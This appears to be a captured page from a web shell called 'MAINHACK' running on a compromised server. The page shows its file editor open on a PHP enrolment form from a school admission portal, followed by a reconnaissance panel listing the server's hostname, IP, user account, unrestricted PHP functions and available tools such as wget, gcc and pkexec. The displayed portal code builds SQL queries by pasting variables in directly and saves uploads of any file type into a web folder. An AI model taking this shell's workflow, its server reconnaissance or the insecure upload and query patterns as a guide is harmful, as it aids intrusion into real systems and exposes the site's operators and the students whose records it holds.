[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: print-records.php
<?php error_reporting(0); include("functions.php"); if(!isset($_SESSION['index_no78897498'])){ header("location:index"); } else { $s_code = $_SESSION['index_no78897498']; $indexx = mysqli_query($new,"SELECT * FROM enrol_generic WHERE indexNo = '$s_code'"); $fetchsch = mysqli_fetch_array($indexx); $school_code = $fetchsch['s_code']; $getschool = mysqli_query($new,"SELECT short_code FROM schools WHERE school_code = '$school_code'"); $fetchschcode = mysqli_fetch_array($getschool); $shortcode = $fetchschcode['short_code']; $select_pay = mysqli_query($new,"SELECT * FROM stud_payment WHERE indexNumber = '$s_code' and s_code = '$school_code'"); $getpay = mysqli_fetch_array($select_pay); $pstatus = $getpay['pstatus']; if(mysqli_num_rows($select_pay) < 1){ header("location:makepayment"); } elseif (mysqli_num_rows($select_pay) > 0 and $pstatus == 'pending' ) { header("location:payment-pending"); } else { function generateStudentID($new, $school_code) { // Query to get the latest student ID for the given school code $query = "SELECT id FROM enrol_details WHERE s_code = '$school_code' ORDER BY id DESC LIMIT 0 , 1"; $result = mysqli_query($new, $query); // Fetch the result $row = mysqli_fetch_array($result); if (!$row || empty($row['id'])) { $lastId = 0; // Start from 1 if no records exist } else { $lastId = (int) substr($row['id'], -3); // Extract the last 3 digits } // Increment the sequence $no1 = $lastId + 1; // Get the current year $year = '2025'; // Create the new student ID with year prefix and sequence $newSequence = $year . str_pad($no1, 3, '0', STR_PAD_LEFT); // Return the new student ID return $newSequence; } if($_SERVER["REQUEST_METHOD"] == "POST" AND isset($_POST['submit'])){ if(!csrf_token_is_valid() || !csrf_token_is_recent()) { $message = "<p class='alert alert-danger text-center ' role='alert'>Token Authentication Failed</p>"; } else { $enrolfile = $_FILES['enrolfile']; $originalFileName = $_FILES['enrolfile']['name']; $fileType = $_FILES['enrolfile']['type']; $fileTmpName = $_FILES['enrolfile']['tmp_name']; $fileSize = $_FILES['enrolfile']['size']; // Generate a random name for the file to avoid collisions $randomName = bin2hex(random_bytes(8)); // Generates a random 16-character string $fileExtension = pathinfo($originalFileName, PATHINFO_EXTENSION); $newFileName = $randomName . '.' . $fileExtension; // Define the folder to save the uploaded file $uploadFolder = '../admin/uploads/'; $destination = $uploadFolder . $newFileName; move_uploaded_file($fileTmpName, $destination); $profile = $_FILES['profile']; $originalFileName = $_FILES['profile']['name']; $fileType = $_FILES['profile']['type']; $fileTmpName1 = $_FILES['profile']['tmp_name']; $fileSize = $_FILES['profile']['size']; // Generate a random name for the file to avoid collisions $randomName1 = bin2hex(random_bytes(8)); // Generates a random 16-character string $fileExtension1 = pathinfo($originalFileName, PATHINFO_EXTENSION); $newFileName1 = $randomName1 . '.' . $fileExtension1; // Define the folder to save the uploaded file $uploadFolder = '../admin/uploads/'; $destination1 = $uploadFolder . $newFileName1; move_uploaded_file($fileTmpName1, $destination1); $rawscore = test_input($_POST['rawscore']); $enrolcode = test_input($_POST['enrolcode']); $jhs = test_input($_POST['jhs']); $jhs_type = test_input($_POST['jhs_type']); $dob = test_input($_POST['dob']); $placeofbirth = test_input($_POST['placeofbirth']); $nationality = test_input($_POST['nationality']); $religion = test_input($_POST['religion']); $denomination = test_input($_POST['denomination']); $address = test_input($_POST['address']); $town = test_input($_POST['town']); $region = test_input($_POST['region']); $district = test_input($_POST['district']); $interest = test_input($_POST['interest']); $ghanacard = test_input($_POST['ghanacard']); $classselect = test_input($_POST['classselect']); $house_select = test_input($_POST['house_select']); $father = test_input($_POST['father']); $foccupy = test_input($_POST['foccupy']); $mother = test_input($_POST['mother']); $moccupy = test_input($_POST['moccupy']); $guardian = test_input($_POST['guardian']); $telephone = test_input($_POST['telephone']); $gaddress = test_input($_POST['gaddress']); $schoolcode = test_input($_POST['schoolcode']); //$newStudentID = generateStudentID($new, $school_code); $newStudentID = "$shortcode" . generateStudentID($new, $school_code); //$newStudentID = "$shortcode" . generateStudentID($new); $selectme = mysqli_query($new,"SELECT * FROM enrol_details WHERE index_no = '$s_code'"); if(mysqli_num_rows($selectme) < 1){ $stmt = $con->prepare("INSERT INTO enrol_details ( s_code,index_no, raw_score, enrol_code, enrol_form, jhs_attended, jhs_type, date_of_birth, place_of_birth, nationality, religion, religion_denomination, address, town, region, district, ghana_card, house_residence, interest, class_id, photo, mobile_num, father_name, father_occupation, mother_name, mother_occupation, guadian, guadian_address,house_id,schoolID ) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?,?,?,?)"); $stmt->execute(array( $schoolcode,$s_code, $rawscore, $enrolcode, $destination, $jhs, $jhs_type, $dob, $placeofbirth, $nationality, $religion, $denomination, $address, $town, $region, $district, $ghanacard, $address, $interest, $classselect, $destination1, $telephone, $father, $foccupy, $mother, $moccupy, $guardian, $gaddress,$house_select,$newStudentID )); header("location:dashboard"); } else { $stmt = $con->prepare("UPDATE enrol_details SET s_code = ?, raw_score = ?, enrol_code = ?, enrol_form = ?, jhs_attended = ?, jhs_type = ?, date_of_birth = ?, place_of_birth = ?, nationality = ?, religion = ?, religion_denomination = ?, address = ?, town = ?, region = ?, district = ?, ghana_card = ?, house_residence = ?, interest = ?, class_id = ?, photo = ?, mobile_num = ?, father_name = ?, father_occupation = ?, mother_name = ?, mother_occupation = ?, guadian = ?, guadian_address = ?, house_id = ? WHERE index_no = ?"); // Execute the statement with the provided array of values $stmt->execute(array( $schoolcode, $rawscore, $enrolcode, $destination, $jhs, $jhs_type, $dob, $placeofbirth, $nationality, $religion, $denomination, $address, $town, $region, $district, $ghanacard, $address, $interest, $classselect, $destination1, $telephone, $father, $foccupy, $mother, $moccupy, $guardian, $gaddress,$house_select,$s_code )); header("location:dashboard"); } } } ?> <!doctype html> <html lang="en"> <head> <meta charset="utf-8" /> <title>Dashboard | Online Admission Portal</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta content="Premium Multipurpose Admin & Dashboard Template" name="description" /> <meta content="Themesbrand" name="author" /> <!-- App favicon --> <!-- <link rel="shortcut icon" href="assets/images/favicon.ico"> --> <!-- plugin css --> <link href="assets/libs/admin-resources/jquery.vectormap/jquery-jvectormap-1.2.2.css" rel="stylesheet" type="text/css" /> <!-- preloader css --> <link rel="stylesheet" href="assets/css/preloader.min.css" type="text/css" /> <!-- Bootstrap Css --> <link href="assets/css/bootstrap.min.css" id="bootstrap-style" rel="stylesheet" type="text/css" /> <!-- Icons Css --> <link href="assets/css/icons.min.css" rel="stylesheet" type="text/css" /> <!-- App Css--> <link href="assets/css/app.min.css" id="app-style" rel="stylesheet" type="text/css" /> <link href="assets/css/bootstrap.min.css" rel="stylesheet" type="text/css" /> <link href="assets/css/icons.min.css" rel="stylesheet" type="text/css" /> <link href="assets/css/theme.min.css" rel="stylesheet" type="text/css" /> <style> /* Flexbox container for horizontal alignment */ .button-row { display: flex; /* Use flexbox for horizontal alignment */ gap: 10px; /* Add some spacing between buttons */ flex-wrap: wrap; /* Allow wrapping on smaller screens */ align-items: center; /* Align items vertically in the center */ } .button-row h5 { margin: 0; /* Remove default margin */ } /* Apply a red border for required fields that are not filled */ input:invalid, select:invalid, textarea:invalid { border: 2px solid red; } </style> </head> <body> <div id="layout-wrapper"> <?php include("includes/header.php");?> <!-- ========== Left Sidebar Start ========== --> <?php include("includes/sidebar.php");?> <div class="main-content"> <div class="page-content"> <div class="container-fluid"> <?php $code = $_SESSION['index_no78897498']; $studentID = mysqli_query($new,"SELECT * FROM enrol_generic WHERE indexNo = '$code'"); $stud = mysqli_fetch_array($studentID); $getschol = $stud['s_code']; $name = $stud['stud_name']; $programme = $stud['programme']; $stmt = $con->prepare("Select * from schools where school_code = ?"); $stmt->execute(array($getschol)); $row = $stmt->fetch(); $logo = $row['logo']; $school_name = $row['school_name']; ?> <div class="row"> <div class="col-lg-12"> <div class="card"> <div class="card-body"> <h4>PERSONAL DATA </h4> <div> <div class="row"> <div class="col-xl-4 col-md-6"> <div class="form-group mb-3"> <label>Index number</label> <input type="text" readonly data-pristine-required-message="" class="form-control" value="<?php echo $stud['indexNo'];?>" /> </div> </div> <div class="col-xl-4 col-md-6"> <div class="form-group mb-3"> <label>Gender</label> <input type="text" readonly data-pristine-required-message="" class="form-control" value="<?php echo $stud['gender'];?>" /> </div> </div> <div class="col-xl-4 col-md-6"> <div class="form-group mb-3"> <label>Programme</label> <input type="text" readonly data-pristine-min-message="" required class="form-control" value="<?php echo $stud['programme'];?>" placeholder="Enter your age"/> </div> </div> <div class="col-xl-4 col-md-6"> <div class="form-group mb-3"> <label>Residential status</label> <input type="text" readonly data-pristine-required-message="" class="form-control" value="<?php echo $stud['status'];?>"> </div> </div> <div class="col-xl-4 col-md-6"> <div class="form-group mb-3"> <label>Surname</label> <input type="text" readonly class="form-control" value="<?php echo $stud['stud_name'];?>"> </div> </div> <div class="col-xl-4 col-md-6"> <div class="form-group mb-3"> <label>Grade</label> <input type="text" readonly class="form-control" value="<?php echo $stud['grade'];?>"> </div> </div> </div> <?php $enroll_de = mysqli_query($new,"SELECT * FROM enrol_details WHERE index_no = '$code'"); $enroll_info = mysqli_fetch_array($enroll_de); $rawscore1 = $enroll_info['raw_score']; $enrol_code1 = $enroll_info['enrol_code']; $enrol_form1 = $enroll_info['enrol_form']; $jhs_attended1 = $enroll_info['jhs_attended']; $jhs_type1 = $enroll_info['jhs_type']; $dob1 = $enroll_info['date_of_birth']; $place1 = $enroll_info['place_of_birth']; $nationality1 = $enroll_info['nationality']; $religion1 = $enroll_info['religion']; $denomination1 = $enroll_info['religion_denomination']; $address1 = $enroll_info['address']; $town1 = $enroll_info['town']; $region1 = $enroll_info['region']; $district1 = $enroll_info['district']; $interest1 = $enroll_info['interest']; $ghana_card1 = $enroll_info['ghana_card']; $house_residence1 = $enroll_info['house_residence']; $class_id1 = $enroll_info['class_id']; $mobile_num1 = $enroll_info['mobile_num']; $photo1 = $enroll_info['photo']; $father_name1 = $enroll_info['father_name']; $father_occupation1 = $enroll_info['father_occupation']; $mother_name1 = $enroll_info['mother_name']; $mother_occupation1 = $enroll_info['mother_occupation']; $guadian1 = $enroll_info['guadian']; $guadian_address1 = $enroll_info['guadian_address']; $house_select1 = $enroll_info['house_select']; ?> <div class="card-body"> <div class="row"> <div class="col-xl-4 col-md-6"> <div class="form-group mb-3"> <label>Date of Birth *</label> <input type="date" name="dob" value="<?php echo $dob1;?>" data-pristine-required-message="Date of birth is required" class="form-control" required /> </div> </div> <div class="col-xl-4 col-md-6"> <div class="form-group mb-3"> <label>Place of Birth *</label> <input type="text" name="placeofbirth" value="<?php echo $place1;?>" data-pristine-required-message="Place of birth is requres" required class="form-control" /> </div> </div> <div class="col-xl-4 col-md-6"> <div class="form-group mb-3"> <label>Nationality* <?php echo $nationality1;?></label> <select class="form-control" name="nationality" required> <option value="<?php echo $nationality1;?>"> Select type</option> <?php $studentID = mysqli_query($new,"SELECT * FROM country "); while($stud = mysqli_fetch_array($studentID)){ ?> <option value="<?php echo $stud['name'];?>"> <?php echo $stud['name'];?></option> <?php }?> </select> </div> </div> <div class="col-xl-4 col-md-6"> <div class="form-group mb-3"> <label>Religion *<?php echo $religion1;?></label> <select class="form-control" id="religion" name="religion" required> <option value="<?php echo $religion1;?>"> Select</option> <option value="CHRISTIANITY"> CHRISTIANITY </option> <option value="Atheism/Agnosticism"> Atheism/Agnosticism</option> <option value="Buddhism"> Buddhism</option> <option value="Christianity"> Christianity</option> <option value="Confucianism"> Confucianism</option> <option value="Druze"> Druze</option> <option value="Hinduism"> Hinduism</option> <option value="Islam"> Islam</option> <option value="Judaism"> Judaism</option> <option value="Shinto"> Shinto</option> <option value="Traditional African Religions"> Traditional African Religions </option> </select> </div> </div> <div class="col-xl-4 col-md-6"> <div class="form-group mb-3"> <label>Religious Denomination *<?php echo $denomination1;?></label> <select class="form-control" id="denomination" name="denomination"> <option value="<?php echo $denomination1;?>">Select</option> <option value="PENTECOSTAL"> PENTECOSTAL </option> <option value="Catholic"> Catholic</option> <option value="Methodist"> Methodist</option> <option value="Anglican"> Anglican</option> <option value="Presbyterian"> Presbyterian</option> <option value="Pentecostal"> Pentecostal</option> <option value="Baptist"> Baptist</option> <option value="Lutheran"> Lutheran</option> <option value="Seventh-Day Adventist"> Seventh-Day Adventist</option> <option value="Evangelical Charismatic"> Evangelical Charismatic</option> <option value="Latter-day Saint"> Latter-day Saint</option> <option value="Saviour Church"> Saviour Church</option> <option value="Church of Christ"> Church of Christ</option> <option value="Other"> Others</option> </select> </div> </div> <div class="col-xl-4 col-md-6"> <div class="form-group mb-3"> <label>Permanent Address *</label> <input type="text" name="address" value="<?php echo $address1;?>" required class="form-control" > </div> </div> <div class="col-xl-4 col-md-6"> <div class="form-group mb-3"> <label>Town *</label> <input type="text" name="town" value="<?php echo $town1;?>" required class="form-control" > </div> </div> <div class="col-xl-4 col-md-6"> <div class="form-group mb-3"> <label>Region *<?php echo $region1;?></label> <select class="form-control" id="region" name="region" required> <option value="<?php echo $region1;?>">Select</option> <option value="GREATER ACCRA" selected> GREATER ACCRA </option> <option value="Ahafo"> Ahafo</option> <option value="Ashanti"> Ashanti</option> <option value="Bono"> Bono</option> </select> </div> </div> <div class="col-xl-4 col-md-6"> <div class="form-group mb-3"> <label>District *<?php echo $district1;?></label> <select class="form-control" name="district" required> <option value="<?php echo $district1;?>"> Select</option> <option value="ACCRA METROPOLITAN"> ACCRA METROPOLITAN </option> <option Value ="ABLEKUMA CENTRAL MUNICIPAL">ABLEKUMA CENTRAL MUNICIPAL</option><option Value ="ABLEKUMA NORTH MUNICIPAL">ABLEKUMA NORTH MUNICIPAL</option><option Value ="ABLEKUMA WEST MUNICIPAL">ABLEKUMA WEST MUNICIPAL</option><option Value ="ABUAKWA NORTH MUNICIPAL">ABUAKWA NORTH MUNICIPAL</option><option Value ="ABUAKWA SOUTH MUNICIPAL">ABUAKWA SOUTH MUNICIPAL</option> </select> </div> </div> <div class="col-xl-4 col-md-6"> <div class="form-group mb-3"> <label>Interest(s) *<?php echo $interest1;?></label> <select class="form-control" id="interest" name="interest" required> <option value="<?php echo $interest1;?>"></option> <option value="OTHERS"> OTHERS </option> <option value="Athletics"> Athletics</option> <option value="Football"> Football</option> <option value="Debating Club"> Debating Club</option> <option value="Others"> Others</option> </select> </div> </div> <div class="col-xl-4 col-md-6"> <div class="form-group mb-3"> <label>Ghana Card/NHIS No *</label> <input type="text" name="ghanacard" value="<?php echo $ghana_card1;?>" required class="form-control" > </div> </div> <div class="col-xl-4 col-md-6"> <div class="form-group mb-3"> <label>Phone number *</label> <input type="text" name="mobile_num" value="<?php echo $mobile_num1;?>" data-pristine-required-message="Phone number is requres" required class="form-control" /> </div> </div> </div> </div> </div> <script> document.getElementById('submitBtn').addEventListener('click', function() { // Get all radio buttons with name 'options' var radios = document.getElementsByName('house_select'); var isChecked = false; // Loop through radio buttons to see if any is checked for (var i = 0; i < radios.length; i++) { if (radios[i].checked) { isChecked = true; break; } } // If no radio button is checked, show an alert if (!isChecked) { alert("Please select your House."); } }); </script> </div> </div> <!-- end card --> </div> <!-- end col --> </div> </div> <!-- container-fluid --> </div> <!-- End Page-content --> <?php include("../admin/includes/footer.php");?> </div> <!-- end main content--> </div> <!-- END layout-wrapper --> <!-- Right Sidebar --> <div class="right-bar"> <div data-simplebar class="h-100"> <!-- <div class="rightbar-title d-flex align-items-center p-3"> <h5 class="m-0 me-2">Theme Customizer</h5> <a href="javascript:void(0);" class="right-bar-toggle ms-auto"> <i class="mdi mdi-close noti-icon"></i> </a> </div> --> <!-- Settings --> <hr class="m-0" /> <div class="p-4"> <h6 class="mb-3">Layout</h6> <div class="form-check form-check-inline"> <input class="form-check-input" type="radio" name="layout" id="layout-vertical" value="vertical"> <label class="form-check-label" for="layout-vertical">Vertical</label> </div> <div class="form-check form-check-inline"> <input class="form-check-input" type="radio" name="layout" id="layout-horizontal" value="horizontal"> <label class="form-check-label" for="layout-horizontal">Horizontal</label> </div> <h6 class="mt-4 mb-3 pt-2">Layout Mode</h6> <div class="form-check form-check-inline"> <input class="form-check-input" type="radio" name="layout-mode" id="layout-mode-light" value="light"> <label class="form-check-label" for="layout-mode-light">Light</label> </div> <div class="form-check form-check-inline"> <input class="form-check-input" type="radio" name="layout-mode" id="layout-mode-dark" value="dark"> <label class="form-check-label" for="layout-mode-dark">Dark</label> </div> <h6 class="mt-4 mb-3 pt-2">Layout Width</h6> <div class="form-check form-check-inline"> <input class="form-check-input" type="radio" name="layout-width" id="layout-width-fuild" value="fuild" onchange="document.body.setAttribute('data-layout-size', 'fluid')"> <label class="form-check-label" for="layout-width-fuild">Fluid</label> </div> <div class="form-check form-check-inline"> <input class="form-check-input" type="radio" name="layout-width" id="layout-width-boxed" value="boxed" onchange="document.body.setAttribute('data-layout-size', 'boxed')"> <label class="form-check-label" for="layout-width-boxed">Boxed</label> </div> <h6 class="mt-4 mb-3 pt-2">Layout Position</h6> <div class="form-check form-check-inline"> <input class="form-check-input" type="radio" name="layout-position" id="layout-position-fixed" value="fixed" onchange="document.body.setAttribute('data-layout-scrollable', 'false')"> <label class="form-check-label" for="layout-position-fixed">Fixed</label> </div> <div class="form-check form-check-inline"> <input class="form-check-input" type="radio" name="layout-position" id="layout-position-scrollable" value="scrollable" onchange="document.body.setAttribute('data-layout-scrollable', 'true')"> <label class="form-check-label" for="layout-position-scrollable">Scrollable</label> </div> <h6 class="mt-4 mb-3 pt-2">Topbar Color</h6> <div class="form-check form-check-inline"> <input class="form-check-input" type="radio" name="topbar-color" id="topbar-color-light" value="light" onchange="document.body.setAttribute('data-topbar', 'light')"> <label class="form-check-label" for="topbar-color-light">Light</label> </div> <div class="form-check form-check-inline"> <input class="form-check-input" type="radio" name="topbar-color" id="topbar-color-dark" value="dark" onchange="document.body.setAttribute('data-topbar', 'dark')"> <label class="form-check-label" for="topbar-color-dark">Dark</label> </div> <h6 class="mt-4 mb-3 pt-2 sidebar-setting">Sidebar Size</h6> <div class="form-check sidebar-setting"> <input class="form-check-input" type="radio" name="sidebar-size" id="sidebar-size-default" value="default" onchange="document.body.setAttribute('data-sidebar-size', 'lg')"> <label class="form-check-label" for="sidebar-size-default">Default</label> </div> <div class="form-check sidebar-setting"> <input class="form-check-input" type="radio" name="sidebar-size" id="sidebar-size-compact" value="compact" onchange="document.body.setAttribute('data-sidebar-size', 'md')"> <label class="form-check-label" for="sidebar-size-compact">Compact</label> </div> <div class="form-check sidebar-setting"> <input class="form-check-input" type="radio" name="sidebar-size" id="sidebar-size-small" value="small" onchange="document.body.setAttribute('data-sidebar-size', 'sm')"> <label class="form-check-label" for="sidebar-size-small">Small (Icon View)</label> </div> <h6 class="mt-4 mb-3 pt-2 sidebar-setting">Sidebar Color</h6> <div class="form-check sidebar-setting"> <input class="form-check-input" type="radio" name="sidebar-color" id="sidebar-color-light" value="light" onchange="document.body.setAttribute('data-sidebar', 'light')"> <label class="form-check-label" for="sidebar-color-light">Light</label> </div> <div class="form-check sidebar-setting"> <input class="form-check-input" type="radio" name="sidebar-color" id="sidebar-color-dark" value="dark" onchange="document.body.setAttribute('data-sidebar', 'dark')"> <label class="form-check-label" for="sidebar-color-dark">Dark</label> </div> <div class="form-check sidebar-setting"> <input class="form-check-input" type="radio" name="sidebar-color" id="sidebar-color-brand" value="brand" onchange="document.body.setAttribute('data-sidebar', 'brand')"> <label class="form-check-label" for="sidebar-color-brand">Brand</label> </div> <h6 class="mt-4 mb-3 pt-2">Direction</h6> <div class="form-check form-check-inline"> <input class="form-check-input" type="radio" name="layout-direction" id="layout-direction-ltr" value="ltr"> <label class="form-check-label" for="layout-direction-ltr">LTR</label> </div> <div class="form-check form-check-inline"> <input class="form-check-input" type="radio" name="layout-direction" id="layout-direction-rtl" value="rtl"> <label class="form-check-label" for="layout-direction-rtl">RTL</label> </div> </div> </div> <!-- end slimscroll-menu--> </div> <!-- /Right-bar --> <!-- Right bar overlay--> <div class="rightbar-overlay"></div> <!-- JAVASCRIPT --> <script src="assets/libs/jquery/jquery.min.js"></script> <script src="assets/libs/bootstrap/js/bootstrap.bundle.min.js"></script> <script src="assets/libs/metismenu/metisMenu.min.js"></script> <script src="assets/libs/simplebar/simplebar.min.js"></script> <script src="assets/libs/node-waves/waves.min.js"></script> <script src="assets/libs/feather-icons/feather.min.js"></script> <!-- pace js --> <script src="assets/libs/pace-js/pace.min.js"></script> <!-- apexcharts --> <script src="assets/libs/apexcharts/apexcharts.min.js"></script> <!-- Plugins js--> <script src="assets/libs/admin-resources/jquery.vectormap/jquery-jvectormap-1.2.2.min.js"></script> <script src="assets/libs/admin-resources/jquery.vectormap/maps/jquery-jvectormap-world-mill-en.js"></script> <!-- dashboard init --> <!-- pristine js --> <script src="assets/libs/pristinejs/pristine.min.js"></script> <!-- form validation --> <script src="assets/js/pages/form-validation.init.js"></script> <script src="assets/js/app.js"></script> </body> </html> <?php } }?>
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 59.8 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002